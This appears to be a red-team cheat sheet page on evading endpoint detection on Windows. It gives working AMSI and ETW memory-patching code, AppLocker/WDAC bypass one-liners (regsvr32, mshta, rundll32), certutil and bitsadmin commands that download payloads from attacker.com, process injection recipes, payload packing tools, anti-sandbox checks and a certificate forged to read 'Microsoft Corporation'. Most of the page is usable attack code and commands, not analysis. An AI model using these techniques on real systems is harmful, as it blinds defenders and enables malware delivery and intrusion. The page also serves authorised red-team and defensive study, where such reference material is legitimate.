RT/EDR

Resources

# Attacking EDR series
https://riccardoancarani.github.io/2023-08-03-attacking-an-edr-part-1/
https://riccardoancarani.github.io/2023-09-14-attacking-an-edr-part-2/
https://riccardoancarani.github.io/2023-11-07-attacking-an-edr-part-3/
https://labs.infoguard.ch/posts/edr_part1_intro_-_security_analysis_of_edr_drivers/
https://labs.infoguard.ch/posts/edr_part2_driver_analysis_results/
https://labs.infoguard.ch/posts/edr_part3_one_bug_to_stop_them_all/
https://labs.infoguard.ch/posts/attacking_edr_part4_fuzzing_defender_scanning_and_emulation_engine/

# Syscalls
https://www.darkrelay.com/post/stealth-syscall-execution-bypass-edr-detection

# Resources compilation
https://github.com/tkmru/awesome-edr-bypass

# File sharing
https://www.lolfs.app/

AMSI Bypass Techniques

PowerShell AMSI Bypass

# Simple bypass (may be detected)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Obfuscated version
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1)

# Memory patching
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

# Online generator (use with caution - may be flagged)
# https://amsi.fail/

.NET AMSI Bypass

// Patch amsi.dll in memory
using System;
using System.Runtime.InteropServices;

public class Bypass
{
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    public static void Run()
    {
        IntPtr lib = LoadLibrary("amsi.dll");
        IntPtr addr = GetProcAddress(lib, "AmsiScanBuffer");
        uint oldProtect;
        VirtualProtect(addr, (UIntPtr)5, 0x40, out oldProtect);
        byte[] patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
        Marshal.Copy(patch, 0, addr, 6);
    }
}

ETW Patching

# ETW (Event Tracing for Windows) logs .NET assembly loads
# Patch to blind defenders

$code = @"
using System;
using System.Runtime.InteropServices;

public class Etw
{
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    public static void Patch()
    {
        IntPtr lib = LoadLibrary("ntdll.dll");
        IntPtr addr = GetProcAddress(lib, "EtwEventWrite");
        uint oldProtect;
        VirtualProtect(addr, (UIntPtr)1, 0x40, out oldProtect);
        Marshal.WriteByte(addr, 0xC3); // ret
    }
}
"@
Add-Type $code
[Etw]::Patch()

Syscall Techniques

Direct Syscalls

// Bypass user-mode hooks by calling syscalls directly
// Each Windows version has different syscall numbers

// Example: NtAllocateVirtualMemory syscall
// Windows 10: 0x18
// Windows 11: 0x18 (may vary)

// SysWhispers/SysWhispers2/SysWhispers3
// https://github.com/jthuraisamy/SysWhispers
// https://github.com/klezVirus/SysWhispers3

Hell's Gate

// Dynamic syscall resolution at runtime
// https://github.com/am0nsec/HellsGate

// Technique: Read syscall number from ntdll.dll on disk
// Avoids hardcoded syscall numbers
// Bypasses user-mode hooks

Halo's Gate

// Similar to Hell's Gate but handles hooked functions
// https://blog.sektor7.net/#!res/2021/halosgate.md

// If target syscall is hooked (JMP instruction)
// Look at neighboring syscalls to calculate correct number

Process Injection Techniques

Classic Injection

// CreateRemoteThread injection
// Commonly detected by EDRs

// 1. OpenProcess
// 2. VirtualAllocEx
// 3. WriteProcessMemory
// 4. CreateRemoteThread

// Use direct syscalls to evade hooks

Process Hollowing

// 1. Create suspended process
// 2. Unmap legitimate code
// 3. Write malicious code
// 4. Resume process

// Tools:
// https://github.com/m0n0ph1/Process-Hollowing

Thread Hijacking

// 1. Open target process
// 2. Suspend thread
// 3. Get thread context
// 4. Modify RIP/EIP to point to shellcode
// 5. Resume thread

// More stealthy than CreateRemoteThread

APC Injection

// Asynchronous Procedure Call injection
// Queue shellcode to run when thread enters alertable state

// 1. OpenProcess
// 2. VirtualAllocEx
// 3. WriteProcessMemory
// 4. QueueUserAPC

// NtQueueApcThread for early bird injection

Module Stomping

// Load legitimate DLL
// Overwrite its memory with malicious code
// Execute from "legitimate" memory region

// Evades memory scanning looking for unbacked executable regions

Process Ghosting

// Modern technique (Windows 10+)
// 1. Create file on disk with malicious payload
// 2. Set file to delete-pending state (NtSetInformationFile with FileDispositionInformation)
// 3. Create section from delete-pending file
// 4. Delete file (now deleted but section still valid)
// 5. Create process from section
// 6. AV can't scan file - it's deleted but process runs

// Tools:
// https://github.com/hasherezade/process_ghosting

Process Doppelganging

// Uses NTFS transactions
// 1. Create transaction
// 2. Open target file within transaction
// 3. Overwrite file with malicious content (transacted)
// 4. Create section from transacted file
// 5. Rollback transaction (original file restored)
// 6. Create process from section

// Process appears to come from legitimate file
// https://github.com/hasherezade/process_doppelganging

Process Herpaderping

// 1. Write malicious payload to file
// 2. Create section from malicious file
// 3. Modify file on disk to look legitimate
// 4. Create process from section
// 5. AV scans modified file (benign), but malicious section executes

// https://github.com/jxy-s/herpaderping

Transacted Hollowing

// Combine process hollowing with NTFS transactions
// 1. Create transaction
// 2. Create process in suspended state
// 3. Within transaction, write malicious code to memory
// 4. Rollback transaction
// 5. Resume process

// Memory modifications are harder to track

AppLocker/WDAC Bypass

AppLocker Bypass Techniques

# MSBuild bypass
# Create inline task with malicious code
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml

# payload.xml:
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          public class ClassExample : Task, ITask {
            public override bool Execute() {
              System.Diagnostics.Process.Start("calc.exe");
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

# InstallUtil bypass
# Requires .NET assembly with RunInstaller attribute
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.dll

# Cscript/Wscript bypass
cscript //E:jscript C:\Windows\Temp\payload.txt

# Regsvr32 bypass (network)
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

# WMIC bypass
wmic process call create "cmd /c calc.exe"

# Mshta bypass
mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""calc.exe"":close")
mshta http://attacker.com/payload.hta

# Rundll32 bypass
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").Run("calc.exe")

WDAC (Windows Defender Application Control) Bypass

# WDAC is more restrictive than AppLocker

# Check WDAC status
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

# Bypass via Microsoft-signed binaries (LOLBAS)
# https://lolbas-project.github.io/

# Bypass via unsigned policy (if misconfigured)
# Check for unsigned WDAC policy
Get-SystemDriver -SIPolicyPath | Where-Object {$_.IsEnforced -eq $false}

# Managed installer bypass (if configured)
# Applications installed via SCCM/Intune may be allowed

# ISG bypass (Intelligent Security Graph)
# Applications with good reputation may be allowed
# Use legitimate signed apps as carriers

# Filepath rules bypass
# If WDAC uses path rules, place payload in allowed directory
# Common allowed paths: C:\Windows\*, Program Files\*

# COM object hijacking
# If COM object is allowed, hijack it
# https://github.com/tyranid/DotNetToJScript

# Enumerate WDAC policy
$policy = [System.IO.File]::ReadAllBytes("C:\Windows\System32\CodeIntegrity\SIPolicy.p7b")
# Or use CiTool
CiTool.exe --list-policies

# Check for exceptions
# Look for FilePathRule, Publisher rules with wildcards
ConvertFrom-CIPolicy -XmlFilePath policy.xml

# WDAC audit mode detection
# In audit mode, blocked apps still run but are logged
Get-WinEvent -LogName "Microsoft-Windows-CodeIntegrity/Operational" | Where-Object {$_.Id -eq 3076}

Bypass Detection

# Check what's blocked
Get-AppLockerPolicy -Effective -Xml | Out-File applocker.xml
Get-AppLockerFileInformation -EventLog | Sort-Object -Property TimeGenerated -Descending

# Find allowed paths
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections

# Test if specific file would be allowed
Get-AppLockerFileInformation -Path "C:\malware.exe" | Test-AppLockerPolicy -PolicyPath applocker.xml

Obfuscation Techniques

String Obfuscation

// XOR strings
byte[] encrypted = { 0x41, 0x6d, 0x73, 0x69, 0x53, 0x63, 0x61, 0x6e, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72 };
byte key = 0x42;
string decrypted = Encoding.ASCII.GetString(encrypted.Select(b => (byte)(b ^ key)).ToArray());

// Base64 encoding
string encoded = Convert.ToBase64String(Encoding.UTF8.GetBytes("AmsiScanBuffer"));
string decoded = Encoding.UTF8.GetString(Convert.FromBase64String(encoded));

// Caesar cipher, AES encryption, etc.

Payload Encryption

# AES encrypt payload
$key = [System.Text.Encoding]::UTF8.GetBytes("0123456789ABCDEF")
$iv = [System.Text.Encoding]::UTF8.GetBytes("FEDCBA9876543210")

$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Key = $key
$aes.IV = $iv

$encryptor = $aes.CreateEncryptor()
$plaintext = [System.Text.Encoding]::UTF8.GetBytes($payload)
$encrypted = $encryptor.TransformFinalBlock($plaintext, 0, $plaintext.Length)

Code Signing

# Sign binaries with valid certificate
# More trusted by EDRs

# Self-signed (less effective)
makecert -r -pe -n "CN=Microsoft Corporation" -ss my -sr currentuser

# Stolen/purchased code signing cert
signtool sign /f cert.pfx /p password /t http://timestamp.server malware.exe

EDR Detection Checks

# Check for EDR processes
Get-Process | Where-Object {$_.ProcessName -match "MsMpEng|CrowdStrike|Carbon|Cylance|Tanium|SentinelOne|cb|defender"}

# Check for EDR services
Get-Service | Where-Object {$_.DisplayName -match "CrowdStrike|Carbon Black|Cylance|SentinelOne|Tanium|Defender"}

# Check loaded DLLs (hooks)
Get-Process -Id $PID | Select-Object -ExpandProperty Modules | Select-Object FileName

# Check for kernel callbacks
# Requires admin/driver
# https://github.com/br-sn/CheekyBlinder

EDR Bypass Tools

# Donut - Shellcode generator
# https://github.com/TheWover/donut
donut -i payload.exe -o payload.bin

# Scarecrow - Payload generator
# https://github.com/optiv/ScareCrow
ScareCrow -I payload.bin -Loader binary -domain microsoft.com

# Nimcrypt2 - Packer
# https://github.com/icyguider/Nimcrypt2
nimcrypt2 -f payload.exe -o output.exe

# Freeze - Payload creation
# https://github.com/optiv/Freeze

# PEzor - PE packer
# https://github.com/phra/PEzor
PEzor.sh -sgn payload.exe -z 2 -unhook

# Shhhloader
# https://github.com/icyguider/Shhhloader

# Inceptor - Template-based evasion
# https://github.com/klezVirus/inceptor

Living Off The Land (LOLBAS)

# Use legitimate Windows binaries
# https://lolbas-project.github.io/

# Download files
certutil -urlcache -f http://attacker.com/payload.exe payload.exe
bitsadmin /transfer job /download /priority high http://attacker.com/payload.exe C:\Users\Public\payload.exe

# Execute code
mshta http://attacker.com/payload.hta
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -ep bypass -c IEX(cmd)")

# Compile/execute
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:payload.exe payload.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml

Anti-Analysis Techniques

// Check for debugging
if (System.Diagnostics.Debugger.IsAttached) Environment.Exit(0);

// Check for sandbox (low memory, single CPU)
if (Environment.ProcessorCount < 2) Environment.Exit(0);
if (new Microsoft.VisualBasic.Devices.ComputerInfo().TotalPhysicalMemory < 2147483648) Environment.Exit(0);

// Check for VM artifacts
string[] vmFiles = { "VBoxService.exe", "vmtoolsd.exe", "vmwaretray.exe" };
foreach (var p in Process.GetProcesses())
    if (vmFiles.Contains(p.ProcessName)) Environment.Exit(0);

// Time-based evasion (sleep to evade sandbox)
Thread.Sleep(120000); // 2 minutes

// User interaction required
MessageBox.Show("Click OK to continue"); // Won't work in automated sandbox

Defensive Evasion Checklist

□ AMSI bypassed
□ ETW patched
□ Using direct syscalls
□ Strings obfuscated
□ Payload encrypted
□ No suspicious API call patterns
□ Parent process spoofed
□ Command line arguments hidden
□ Using legitimate process for injection
□ Signed binary (if possible)
□ Anti-sandbox checks implemented
□ Anti-debugging enabled

Previoustools everywhere NextWireless Testing

Last updated 8 days ago

Was this helpful?

hashtagResources

hashtagAMSI Bypass Techniques

hashtagPowerShell AMSI Bypass

hashtag.NET AMSI Bypass

hashtagETW Patching

hashtagSyscall Techniques

hashtagDirect Syscalls

hashtagHell's Gate

hashtagHalo's Gate

hashtagProcess Injection Techniques

hashtagClassic Injection

hashtagProcess Hollowing

hashtagThread Hijacking

hashtagAPC Injection

hashtagModule Stomping

hashtagProcess Ghosting

hashtagProcess Doppelganging

hashtagProcess Herpaderping

hashtagTransacted Hollowing

hashtagAppLocker/WDAC Bypass

hashtagAppLocker Bypass Techniques

hashtagWDAC (Windows Defender Application Control) Bypass

hashtagBypass Detection

hashtagObfuscation Techniques

hashtagString Obfuscation

hashtagPayload Encryption

hashtagCode Signing

hashtagEDR Detection Checks

hashtagEDR Bypass Tools

hashtagLiving Off The Land (LOLBAS)

hashtagAnti-Analysis Techniques

hashtagDefensive Evasion Checklist

Resources

AMSI Bypass Techniques

PowerShell AMSI Bypass

.NET AMSI Bypass

ETW Patching

Syscall Techniques

Direct Syscalls

Hell's Gate

Halo's Gate

Process Injection Techniques

Classic Injection

Process Hollowing

Thread Hijacking

APC Injection

Module Stomping

Process Ghosting

Process Doppelganging

Process Herpaderping

Transacted Hollowing

AppLocker/WDAC Bypass

AppLocker Bypass Techniques

WDAC (Windows Defender Application Control) Bypass

Bypass Detection

Obfuscation Techniques

String Obfuscation

Payload Encryption

Code Signing

EDR Detection Checks

EDR Bypass Tools

Living Off The Land (LOLBAS)

Anti-Analysis Techniques

Defensive Evasion Checklist